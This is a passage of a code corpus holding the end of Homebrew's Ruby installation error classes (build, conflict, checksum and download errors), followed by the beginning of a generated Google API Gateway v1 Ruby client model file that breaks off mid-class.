    attr_reader :formula

    def initialize(formula, message = "")
      @formula = formula
      super(message)
    end
  end
end
# Raised when a formula cannot be installed for a known reason.
class CannotInstallFormulaError < RuntimeError; end
# Raised when the requested formula is already installed.
class FormulaAlreadyInstalledError < RuntimeError; end
# Raised when an install of this formula was already attempted (and failed)
# earlier in the same run.
class FormulaInstallationAlreadyAttemptedError < Homebrew::InstallationError
  def message
    "Formula installation already attempted: #{formula}"
  end
end
# Raised when a dependency is installed, but without the options the
# dependent formula +f+ requires.
class UnsatisfiedDependencyError < Homebrew::InstallationError
  def initialize(f, dep)
    super f, <<-EOS.undent
      #{f} dependency #{dep} not installed with:
        #{dep.missing_options * ', '}
      EOS
  end
end
# Raised when one or more of a formula's Requirements cannot be satisfied
# by anything available on the user's system.
class UnsatisfiedRequirements < Homebrew::InstallationError
  attr_reader :reqs

  # formula - the formula whose build failed
  # reqs    - the unmet Requirement objects
  def initialize(formula, reqs)
    @reqs = reqs
    message = (reqs.length == 1) \
      ? "An unsatisfied requirement failed this build." \
      : "Unsatisfied requirements failed this build." # fixed typo: was "Unsatisifed"
    super formula, message
  end
end
# Raised when a dependency was built against a different C++ standard
# library than the one this formula's build would use.
class IncompatibleCxxStdlibs < Homebrew::InstallationError
  # NOTE(review): the +right+ argument (the stdlib this build would use) is
  # accepted but never referenced in the message — confirm whether it
  # should be mentioned.
  def initialize(f, dep, wrong, right)
    super f, <<-EOS.undent
      #{f} dependency #{dep} was built with a different C++ standard
      library (#{wrong.type_string} from #{wrong.compiler}). This could cause problems at runtime.
      EOS
  end
end
# Raised when installing +f+ would conflict with formulae that are already
# installed and linked.
class FormulaConflictError < Homebrew::InstallationError
  attr_reader :f, :conflicts
  def initialize(f, conflicts)
    @f = f
    @conflicts = conflicts
    super f, message
  end
  # One bullet line per conflicting formula, with its reason when given.
  def conflict_message(conflict)
    message = []
    message << "  #{conflict.name}"
    message << ": because #{conflict.reason}" if conflict.reason
    message.join
  end
  # Full multi-line explanation, ending with unlink instructions.
  def message
    message = []
    message << "Cannot install #{f.name} because conflicting formulae are installed.\n"
    message.concat conflicts.map { |c| conflict_message(c) } << ""
    message << <<-EOS.undent
      Please `brew unlink #{conflicts.map(&:name)*' '}` before continuing.
      Unlinking removes a formula's symlinks from #{HOMEBREW_PREFIX}. You can
      link the formula again after the install finishes. You can --force this
      install, but the build may fail or cause obscure side-effects in the
      resulting software.
      EOS
    message.join("\n")
  end
end
# Raised when an external build command run for a formula exits non-zero.
# Remembers the failing command, its exit status and a snapshot of ENV so
# #dump can print diagnostics afterwards.
class BuildError < Homebrew::InstallationError
  attr_reader :exit_status, :command, :env
  def initialize formula, cmd, args, es
    @command = cmd
    @env = ENV.to_hash
    # +es+ may be nil (or lack #exitstatus); fall back to a generic 1.
    @exit_status = es.exitstatus rescue 1
    # Escape spaces so the reported command line can be copy/pasted.
    args = args.map{ |arg| arg.to_s.gsub " ", "\\ " }.join(" ")
    super formula, "Failed executing: #{command} #{args}"
  end
  def was_running_configure?
    @command == './configure'
  end
  # GitHub issues mentioning this formula, fetched lazily and memoized.
  def issues
    @issues ||= fetch_issues
  end
  def fetch_issues
    GitHub.issues_for_formula(formula.name)
  rescue GitHub::RateLimitExceededError => e
    # Rate limiting is non-fatal: warn and report no issues.
    opoo e.message
    []
  end
  # Prints a post-mortem for the failed build. Verbose mode dumps the build
  # configuration, environment and log locations; otherwise it points the
  # user at the appropriate issue tracker.
  def dump
    if not ARGV.verbose?
      puts
      puts "#{Tty.red}READ THIS#{Tty.reset}: #{Tty.em}#{ISSUES_URL}#{Tty.reset}"
      if formula.tap?
        user, repo = formula.tap.split '/'
        tap_issues_url = "https://github.com/#{user}/homebrew-#{repo}/issues"
        puts "If reporting this issue please do so at (not Homebrew/homebrew):"
        puts "  #{tap_issues_url}"
      end
    else
      require 'cmd/--config'
      require 'cmd/--env'
      unless formula.core_formula?
        ohai "Formula"
        puts "Tap: #{formula.tap}"
        puts "Path: #{formula.path.realpath}"
      end
      ohai "Configuration"
      Homebrew.dump_build_config
      ohai "ENV"
      Homebrew.dump_build_env(env)
      puts
      onoe "#{formula.name} did not build"
      unless (logs = Dir["#{HOMEBREW_LOGS}/#{formula}/*"]).empty?
        puts "Logs:"
        puts logs.map{|fn| "     #{fn}"}.join("\n")
      end
    end
    puts
    # NOTE(review): the GitHub issue lookup is skipped on Rubies older
    # than 1.8.6.
    unless RUBY_VERSION < "1.8.6" || issues.empty?
      puts "These open issues may also help:"
      puts issues.map{ |i| "#{i['title']} (#{i['html_url']})" }.join("\n")
    end
  end
end
# raised by CompilerSelector if the formula fails with all of
# the compilers available on the user's system; the message suggests
# installing apple-gcc42 as an additional compiler.
class CompilerSelectionError < Homebrew::InstallationError
  def initialize f
    super f, <<-EOS.undent
      #{f.name} cannot be built with any available compilers.
      To install this formula, you may need to:
        brew install apple-gcc42
      EOS
  end
end
# Raised in Resource.fetch; wraps the underlying failure +e+ with the name
# of the resource that could not be downloaded.
class DownloadError < RuntimeError
  def initialize(resource, e)
    super <<-EOS.undent
      Failed to download resource #{resource.download_name.inspect}
      #{e.message}
      EOS
  end
end
# raised in CurlDownloadStrategy.fetch
class CurlDownloadStrategyError < RuntimeError; end
# raised by safe_system in utils.rb
class ErrorDuringExecution < RuntimeError; end
# raised by Pathname#verify_checksum when "expected" is nil or empty
class ChecksumMissingError < ArgumentError; end
# raised by Pathname#verify_checksum when verification fails
class ChecksumMismatchError < RuntimeError
  attr_reader :expected, :hash_type
  # fn       - path of the downloaded archive
  # expected - expected checksum; must respond to #hash_type
  # actual   - checksum computed from the file on disk
  def initialize fn, expected, actual
    @expected = expected
    @hash_type = expected.hash_type.to_s.upcase
    super <<-EOS.undent
      #{@hash_type} mismatch
      Expected: #{expected}
      Actual: #{actual}
      Archive: #{fn}
      To retry an incomplete download, remove the file above.
      EOS
  end
end
# Raised when a formula references a resource it never defined.
class ResourceMissingError < ArgumentError
  def initialize(formula, resource)
    @formula = formula
    @resource = resource
  end

  # Human-readable description naming the offending formula and resource.
  def to_s
    %Q{Formula #{@formula} does not define resource "#{@resource}".}
  end
end

# Raised when the same resource name is defined twice in one formula.
class DuplicateResourceError < ArgumentError
  def initialize(resource)
    @resource = resource
  end

  def to_s
    %Q{Resource "#{@resource}" defined more than once.}
  end
end
| 25.460208 | 96 | 0.682387 |
e9d23e72d2142865b1ea47e6eac15daeaadf17b8 | 50,894 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module ApigatewayV1
# An API that can be served by one or more Gateways.
class ApigatewayApi
include Google::Apis::Core::Hashable
# Output only. Created time.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Optional. Display name.
# Corresponds to the JSON property `displayName`
# @return [String]
attr_accessor :display_name
# Optional. Resource labels to represent user-provided metadata. Refer to cloud
# documentation on labels for more details. https://cloud.google.com/compute/
# docs/labeling-resources
# Corresponds to the JSON property `labels`
# @return [Hash<String,String>]
attr_accessor :labels
# Optional. Immutable. The name of a Google Managed Service ( https://cloud.
# google.com/service-infrastructure/docs/glossary#managed). If not specified, a
# new Service will automatically be created in the same project as this API.
# Corresponds to the JSON property `managedService`
# @return [String]
attr_accessor :managed_service
# Output only. Resource name of the API. Format: projects/`project`/locations/
# global/apis/`api`
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# Output only. State of the API.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# Output only. Updated time.
# Corresponds to the JSON property `updateTime`
# @return [String]
attr_accessor :update_time
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@create_time = args[:create_time] if args.key?(:create_time)
@display_name = args[:display_name] if args.key?(:display_name)
@labels = args[:labels] if args.key?(:labels)
@managed_service = args[:managed_service] if args.key?(:managed_service)
@name = args[:name] if args.key?(:name)
@state = args[:state] if args.key?(:state)
@update_time = args[:update_time] if args.key?(:update_time)
end
end
# An API Configuration is a combination of settings for both the Managed Service
# and Gateways serving this API Config.
class ApigatewayApiConfig
include Google::Apis::Core::Hashable
# Output only. Created time.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Optional. Display name.
# Corresponds to the JSON property `displayName`
# @return [String]
attr_accessor :display_name
# Immutable. The Google Cloud IAM Service Account that Gateways serving this
# config should use to authenticate to other services. This may either be the
# Service Account's email (``ACCOUNT_ID`@`PROJECT`.iam.gserviceaccount.com`) or
# its full resource name (`projects/`PROJECT`/accounts/`UNIQUE_ID``). This is
# most often used when the service is a GCP resource such as a Cloud Run Service
# or an IAP-secured service.
# Corresponds to the JSON property `gatewayServiceAccount`
# @return [String]
attr_accessor :gateway_service_account
# Optional. gRPC service definition files. If specified, openapi_documents must
# not be included.
# Corresponds to the JSON property `grpcServices`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfigGrpcServiceDefinition>]
attr_accessor :grpc_services
# Optional. Resource labels to represent user-provided metadata. Refer to cloud
# documentation on labels for more details. https://cloud.google.com/compute/
# docs/labeling-resources
# Corresponds to the JSON property `labels`
# @return [Hash<String,String>]
attr_accessor :labels
# Optional. Service Configuration files. At least one must be included when
# using gRPC service definitions. See https://cloud.google.com/endpoints/docs/
# grpc/grpc-service-config#service_configuration_overview for the expected file
# contents. If multiple files are specified, the files are merged with the
# following rules: * All singular scalar fields are merged using "last one wins"
# semantics in the order of the files uploaded. * Repeated fields are
# concatenated. * Singular embedded messages are merged using these rules for
# nested fields.
# Corresponds to the JSON property `managedServiceConfigs`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfigFile>]
attr_accessor :managed_service_configs
# Output only. Resource name of the API Config. Format: projects/`project`/
# locations/global/apis/`api`/configs/`api_config`
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# Optional. OpenAPI specification documents. If specified, grpc_services and
# managed_service_configs must not be included.
# Corresponds to the JSON property `openapiDocuments`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfigOpenApiDocument>]
attr_accessor :openapi_documents
# Output only. The ID of the associated Service Config ( https://cloud.google.
# com/service-infrastructure/docs/glossary#config).
# Corresponds to the JSON property `serviceConfigId`
# @return [String]
attr_accessor :service_config_id
# Output only. State of the API Config.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# Output only. Updated time.
# Corresponds to the JSON property `updateTime`
# @return [String]
attr_accessor :update_time
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@create_time = args[:create_time] if args.key?(:create_time)
@display_name = args[:display_name] if args.key?(:display_name)
@gateway_service_account = args[:gateway_service_account] if args.key?(:gateway_service_account)
@grpc_services = args[:grpc_services] if args.key?(:grpc_services)
@labels = args[:labels] if args.key?(:labels)
@managed_service_configs = args[:managed_service_configs] if args.key?(:managed_service_configs)
@name = args[:name] if args.key?(:name)
@openapi_documents = args[:openapi_documents] if args.key?(:openapi_documents)
@service_config_id = args[:service_config_id] if args.key?(:service_config_id)
@state = args[:state] if args.key?(:state)
@update_time = args[:update_time] if args.key?(:update_time)
end
end
# A lightweight description of a file.
class ApigatewayApiConfigFile
include Google::Apis::Core::Hashable
# The bytes that constitute the file.
# Corresponds to the JSON property `contents`
# NOTE: Values are automatically base64 encoded/decoded in the client library.
# @return [String]
attr_accessor :contents
# The file path (full or relative path). This is typically the path of the file
# when it is uploaded.
# Corresponds to the JSON property `path`
# @return [String]
attr_accessor :path
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@contents = args[:contents] if args.key?(:contents)
@path = args[:path] if args.key?(:path)
end
end
# A gRPC service definition.
class ApigatewayApiConfigGrpcServiceDefinition
include Google::Apis::Core::Hashable
# A lightweight description of a file.
# Corresponds to the JSON property `fileDescriptorSet`
# @return [Google::Apis::ApigatewayV1::ApigatewayApiConfigFile]
attr_accessor :file_descriptor_set
# Optional. Uncompiled proto files associated with the descriptor set, used for
# display purposes (server-side compilation is not supported). These should
# match the inputs to 'protoc' command used to generate file_descriptor_set.
# Corresponds to the JSON property `source`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfigFile>]
attr_accessor :source
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@file_descriptor_set = args[:file_descriptor_set] if args.key?(:file_descriptor_set)
@source = args[:source] if args.key?(:source)
end
end
# An OpenAPI Specification Document describing an API.
class ApigatewayApiConfigOpenApiDocument
include Google::Apis::Core::Hashable
# A lightweight description of a file.
# Corresponds to the JSON property `document`
# @return [Google::Apis::ApigatewayV1::ApigatewayApiConfigFile]
attr_accessor :document
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@document = args[:document] if args.key?(:document)
end
end
# Specifies the audit configuration for a service. The configuration determines
# which permission types are logged, and what identities, if any, are exempted
# from logging. An AuditConfig must have one or more AuditLogConfigs. If there
# are AuditConfigs for both `allServices` and a specific service, the union of
# the two AuditConfigs is used for that service: the log_types specified in each
# AuditConfig are enabled, and the exempted_members in each AuditLogConfig are
# exempted. Example Policy with multiple AuditConfigs: ` "audit_configs": [ ` "
# service": "allServices", "audit_log_configs": [ ` "log_type": "DATA_READ", "
# exempted_members": [ "user:[email protected]" ] `, ` "log_type": "DATA_WRITE" `,
# ` "log_type": "ADMIN_READ" ` ] `, ` "service": "sampleservice.googleapis.com",
# "audit_log_configs": [ ` "log_type": "DATA_READ" `, ` "log_type": "DATA_WRITE"
# , "exempted_members": [ "user:[email protected]" ] ` ] ` ] ` For sampleservice,
# this policy enables DATA_READ, DATA_WRITE and ADMIN_READ logging. It also
# exempts [email protected] from DATA_READ logging, and [email protected] from
# DATA_WRITE logging.
class ApigatewayAuditConfig
include Google::Apis::Core::Hashable
# The configuration for logging of each type of permission.
# Corresponds to the JSON property `auditLogConfigs`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayAuditLogConfig>]
attr_accessor :audit_log_configs
# Specifies a service that will be enabled for audit logging. For example, `
# storage.googleapis.com`, `cloudsql.googleapis.com`. `allServices` is a special
# value that covers all services.
# Corresponds to the JSON property `service`
# @return [String]
attr_accessor :service
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@audit_log_configs = args[:audit_log_configs] if args.key?(:audit_log_configs)
@service = args[:service] if args.key?(:service)
end
end
# Provides the configuration for logging a type of permissions. Example: ` "
# audit_log_configs": [ ` "log_type": "DATA_READ", "exempted_members": [ "user:
# [email protected]" ] `, ` "log_type": "DATA_WRITE" ` ] ` This enables '
# DATA_READ' and 'DATA_WRITE' logging, while exempting [email protected] from
# DATA_READ logging.
class ApigatewayAuditLogConfig
include Google::Apis::Core::Hashable
# Specifies the identities that do not cause logging for this type of permission.
# Follows the same format of Binding.members.
# Corresponds to the JSON property `exemptedMembers`
# @return [Array<String>]
attr_accessor :exempted_members
# The log type that this config enables.
# Corresponds to the JSON property `logType`
# @return [String]
attr_accessor :log_type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@exempted_members = args[:exempted_members] if args.key?(:exempted_members)
@log_type = args[:log_type] if args.key?(:log_type)
end
end
# Associates `members` with a `role`.
class ApigatewayBinding
include Google::Apis::Core::Hashable
# Represents a textual expression in the Common Expression Language (CEL) syntax.
# CEL is a C-like expression language. The syntax and semantics of CEL are
# documented at https://github.com/google/cel-spec. Example (Comparison): title:
# "Summary size limit" description: "Determines if a summary is less than 100
# chars" expression: "document.summary.size() < 100" Example (Equality): title: "
# Requestor is owner" description: "Determines if requestor is the document
# owner" expression: "document.owner == request.auth.claims.email" Example (
# Logic): title: "Public documents" description: "Determine whether the document
# should be publicly visible" expression: "document.type != 'private' &&
# document.type != 'internal'" Example (Data Manipulation): title: "Notification
# string" description: "Create a notification string with a timestamp."
# expression: "'New message received at ' + string(document.create_time)" The
# exact variables and functions that may be referenced within an expression are
# determined by the service that evaluates it. See the service documentation for
# additional information.
# Corresponds to the JSON property `condition`
# @return [Google::Apis::ApigatewayV1::ApigatewayExpr]
attr_accessor :condition
# Specifies the identities requesting access for a Cloud Platform resource. `
# members` can have the following values: * `allUsers`: A special identifier
# that represents anyone who is on the internet; with or without a Google
# account. * `allAuthenticatedUsers`: A special identifier that represents
# anyone who is authenticated with a Google account or a service account. * `
# user:`emailid``: An email address that represents a specific Google account.
# For example, `[email protected]` . * `serviceAccount:`emailid``: An email
# address that represents a service account. For example, `my-other-app@appspot.
# gserviceaccount.com`. * `group:`emailid``: An email address that represents a
# Google group. For example, `[email protected]`. * `deleted:user:`emailid`?uid=
# `uniqueid``: An email address (plus unique identifier) representing a user
# that has been recently deleted. For example, `[email protected]?uid=
# 123456789012345678901`. If the user is recovered, this value reverts to `user:`
# emailid`` and the recovered user retains the role in the binding. * `deleted:
# serviceAccount:`emailid`?uid=`uniqueid``: An email address (plus unique
# identifier) representing a service account that has been recently deleted. For
# example, `[email protected]?uid=123456789012345678901`.
# If the service account is undeleted, this value reverts to `serviceAccount:`
# emailid`` and the undeleted service account retains the role in the binding. *
# `deleted:group:`emailid`?uid=`uniqueid``: An email address (plus unique
# identifier) representing a Google group that has been recently deleted. For
# example, `[email protected]?uid=123456789012345678901`. If the group is
# recovered, this value reverts to `group:`emailid`` and the recovered group
# retains the role in the binding. * `domain:`domain``: The G Suite domain (
# primary) that represents all the users of that domain. For example, `google.
# com` or `example.com`.
# Corresponds to the JSON property `members`
# @return [Array<String>]
attr_accessor :members
# Role that is assigned to `members`. For example, `roles/viewer`, `roles/editor`
# , or `roles/owner`.
# Corresponds to the JSON property `role`
# @return [String]
attr_accessor :role
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@condition = args[:condition] if args.key?(:condition)
@members = args[:members] if args.key?(:members)
@role = args[:role] if args.key?(:role)
end
end
# The request message for Operations.CancelOperation.
class ApigatewayCancelOperationRequest
include Google::Apis::Core::Hashable
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
end
end
# A textual expression in the Common Expression Language (CEL) syntax.
# CEL is a C-like expression language documented at
# https://github.com/google/cel-spec. Typical examples include IAM
# condition expressions such as
# "request.time < timestamp('2020-10-01T00:00:00.000Z')".
# The exact variables and functions available to an expression are
# determined by the service that evaluates it; see that service's docs.
class ApigatewayExpr
  include Google::Apis::Core::Hashable

  # Optional. Longer description of the expression, e.g. shown when the
  # expression is hovered over in a UI. (JSON key: `description`)
  # @return [String]
  attr_accessor :description

  # Textual representation of the expression in CEL syntax.
  # (JSON key: `expression`)
  # @return [String]
  attr_accessor :expression

  # Optional. Location of the expression for error reporting, e.g. a file
  # name and a position in the file. (JSON key: `location`)
  # @return [String]
  attr_accessor :location

  # Optional. Short title describing the expression's purpose, e.g. for
  # UIs that allow entering expressions. (JSON key: `title`)
  # @return [String]
  attr_accessor :title

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[description expression location title].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# A Gateway is an API-aware HTTP proxy. It performs API-Method and/or
# API-Consumer specific actions based on an API Config, such as
# authentication, policy enforcement, and backend selection.
class ApigatewayGateway
  include Google::Apis::Core::Hashable

  # Required. Resource name of the API Config for this Gateway. Format:
  # projects/`project`/locations/global/apis/`api`/configs/`apiConfig`
  # (JSON key: `apiConfig`)
  # @return [String]
  attr_accessor :api_config

  # Output only. Created time. (JSON key: `createTime`)
  # @return [String]
  attr_accessor :create_time

  # Output only. The default API Gateway host name, of the form
  # ``gateway_id`-`hash`.`region_code`.gateway.dev`.
  # (JSON key: `defaultHostname`)
  # @return [String]
  attr_accessor :default_hostname

  # Optional. Display name. (JSON key: `displayName`)
  # @return [String]
  attr_accessor :display_name

  # Optional. Resource labels representing user-provided metadata. See
  # https://cloud.google.com/compute/docs/labeling-resources
  # (JSON key: `labels`)
  # @return [Hash<String,String>]
  attr_accessor :labels

  # Output only. Resource name of the Gateway. Format:
  # projects/`project`/locations/`location`/gateways/`gateway`
  # (JSON key: `name`)
  # @return [String]
  attr_accessor :name

  # Output only. The current state of the Gateway. (JSON key: `state`)
  # @return [String]
  attr_accessor :state

  # Output only. Updated time. (JSON key: `updateTime`)
  # @return [String]
  attr_accessor :update_time

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[api_config create_time default_hostname display_name labels
       name state update_time].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# Response message for ApiGatewayService.ListApiConfigs.
class ApigatewayListApiConfigsResponse
  include Google::Apis::Core::Hashable

  # The page of API Configs. (JSON key: `apiConfigs`)
  # @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfig>]
  attr_accessor :api_configs

  # Token for retrieving the next page, if any. (JSON key: `nextPageToken`)
  # @return [String]
  attr_accessor :next_page_token

  # Locations that could not be reached.
  # (JSON key: `unreachableLocations`)
  # @return [Array<String>]
  attr_accessor :unreachable_locations

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[api_configs next_page_token unreachable_locations].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# Response message for ApiGatewayService.ListApis.
class ApigatewayListApisResponse
  include Google::Apis::Core::Hashable

  # The page of APIs. (JSON key: `apis`)
  # @return [Array<Google::Apis::ApigatewayV1::ApigatewayApi>]
  attr_accessor :apis

  # Token for retrieving the next page, if any. (JSON key: `nextPageToken`)
  # @return [String]
  attr_accessor :next_page_token

  # Locations that could not be reached.
  # (JSON key: `unreachableLocations`)
  # @return [Array<String>]
  attr_accessor :unreachable_locations

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[apis next_page_token unreachable_locations].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# Response message for ApiGatewayService.ListGateways.
class ApigatewayListGatewaysResponse
  include Google::Apis::Core::Hashable

  # The page of Gateways. (JSON key: `gateways`)
  # @return [Array<Google::Apis::ApigatewayV1::ApigatewayGateway>]
  attr_accessor :gateways

  # Token for retrieving the next page, if any. (JSON key: `nextPageToken`)
  # @return [String]
  attr_accessor :next_page_token

  # Locations that could not be reached.
  # (JSON key: `unreachableLocations`)
  # @return [Array<String>]
  attr_accessor :unreachable_locations

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[gateways next_page_token unreachable_locations].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# The response message for Locations.ListLocations.
class ApigatewayListLocationsResponse
  include Google::Apis::Core::Hashable

  # Locations matching the filter specified in the request.
  # (JSON key: `locations`)
  # @return [Array<Google::Apis::ApigatewayV1::ApigatewayLocation>]
  attr_accessor :locations

  # The standard List next-page token. (JSON key: `nextPageToken`)
  # @return [String]
  attr_accessor :next_page_token

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[locations next_page_token].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# The response message for Operations.ListOperations.
class ApigatewayListOperationsResponse
  include Google::Apis::Core::Hashable

  # The standard List next-page token. (JSON key: `nextPageToken`)
  # @return [String]
  attr_accessor :next_page_token

  # Operations matching the filter specified in the request.
  # (JSON key: `operations`)
  # @return [Array<Google::Apis::ApigatewayV1::ApigatewayOperation>]
  attr_accessor :operations

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[next_page_token operations].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# A resource that represents a Google Cloud Platform location.
class ApigatewayLocation
  include Google::Apis::Core::Hashable

  # The friendly name for this location, typically a nearby city name,
  # e.g. "Tokyo". (JSON key: `displayName`)
  # @return [String]
  attr_accessor :display_name

  # Cross-service attributes for the location, e.g.
  # `"cloud.googleapis.com/region": "us-east1"`. (JSON key: `labels`)
  # @return [Hash<String,String>]
  attr_accessor :labels

  # The canonical id for this location, e.g. `"us-east1"`.
  # (JSON key: `locationId`)
  # @return [String]
  attr_accessor :location_id

  # Service-specific metadata, e.g. available capacity at the location.
  # (JSON key: `metadata`)
  # @return [Hash<String,Object>]
  attr_accessor :metadata

  # Resource name for the location, which may vary between
  # implementations, e.g. `"projects/example-project/locations/us-east1"`.
  # (JSON key: `name`)
  # @return [String]
  attr_accessor :name

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[display_name labels location_id metadata name].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# A long-running operation that is the result of a network API call.
class ApigatewayOperation
  include Google::Apis::Core::Hashable

  # If `false`, the operation is still in progress. If `true`, the
  # operation is completed and either `error` or `response` is available.
  # (JSON key: `done`)
  # @return [Boolean]
  attr_accessor :done
  alias_method :done?, :done

  # Logical error model (`Status`) used by gRPC and REST APIs; carries an
  # error code, message, and details. See
  # https://cloud.google.com/apis/design/errors. (JSON key: `error`)
  # @return [Google::Apis::ApigatewayV1::ApigatewayStatus]
  attr_accessor :error

  # Service-specific metadata associated with the operation — typically
  # progress information and common metadata such as create time. Some
  # services might not provide such metadata. (JSON key: `metadata`)
  # @return [Hash<String,Object>]
  attr_accessor :metadata

  # Server-assigned name, unique only within the service that originally
  # returns it. With the default HTTP mapping it is a resource name
  # ending with `operations/`unique_id``. (JSON key: `name`)
  # @return [String]
  attr_accessor :name

  # The normal response of the operation on success. For methods that
  # return no data (e.g. `Delete`) it is `google.protobuf.Empty`; for
  # standard `Get`/`Create`/`Update` it is the resource; otherwise the
  # type is `XxxResponse` for original method name `Xxx`.
  # (JSON key: `response`)
  # @return [Hash<String,Object>]
  attr_accessor :response

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[done error metadata name response].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# Metadata describing a long-running operation.
class ApigatewayOperationMetadata
  include Google::Apis::Core::Hashable

  # Output only. API version used to start the operation.
  # (JSON key: `apiVersion`)
  # @return [String]
  attr_accessor :api_version

  # Output only. The time the operation was created.
  # (JSON key: `createTime`)
  # @return [String]
  attr_accessor :create_time

  # Output only. Diagnostics generated while processing configuration
  # source files. (JSON key: `diagnostics`)
  # @return [Array<Google::Apis::ApigatewayV1::ApigatewayOperationMetadataDiagnostic>]
  attr_accessor :diagnostics

  # Output only. The time the operation finished running.
  # (JSON key: `endTime`)
  # @return [String]
  attr_accessor :end_time

  # Output only. Whether the user has requested cancellation of the
  # operation. Successfully cancelled operations have an Operation.error
  # with google.rpc.Status.code 1 (`Code.CANCELLED`).
  # (JSON key: `requestedCancellation`)
  # @return [Boolean]
  attr_accessor :requested_cancellation
  alias_method :requested_cancellation?, :requested_cancellation

  # Output only. Human-readable status of the operation, if any.
  # (JSON key: `statusMessage`)
  # @return [String]
  attr_accessor :status_message

  # Output only. Server-defined resource path for the operation's target.
  # (JSON key: `target`)
  # @return [String]
  attr_accessor :target

  # Output only. Name of the verb executed by the operation.
  # (JSON key: `verb`)
  # @return [String]
  attr_accessor :verb

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[api_version create_time diagnostics end_time
       requested_cancellation status_message target verb].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# Diagnostic information produced while processing configuration.
class ApigatewayOperationMetadataDiagnostic
  include Google::Apis::Core::Hashable

  # Location of the diagnostic. (JSON key: `location`)
  # @return [String]
  attr_accessor :location

  # The diagnostic message. (JSON key: `message`)
  # @return [String]
  attr_accessor :message

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[location message].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# An Identity and Access Management (IAM) policy, which specifies access
# controls for Google Cloud resources.
#
# A `Policy` is a collection of `bindings`; each `binding` binds one or
# more `members` (user accounts, service accounts, Google groups, or
# domains) to a single `role` — a named list of permissions, either IAM
# predefined or user-created. For some resource types a binding can also
# carry a `condition`, a logical expression that grants access only when
# it evaluates to `true`, based on attributes of the request and/or the
# resource. To learn which resources support conditions in their IAM
# policies, see
# https://cloud.google.com/iam/help/conditions/resource-policies.
# For a description of IAM and its features, see
# https://cloud.google.com/iam/docs/.
class ApigatewayPolicy
  include Google::Apis::Core::Hashable

  # Specifies cloud audit logging configuration for this policy.
  # (JSON key: `auditConfigs`)
  # @return [Array<Google::Apis::ApigatewayV1::ApigatewayAuditConfig>]
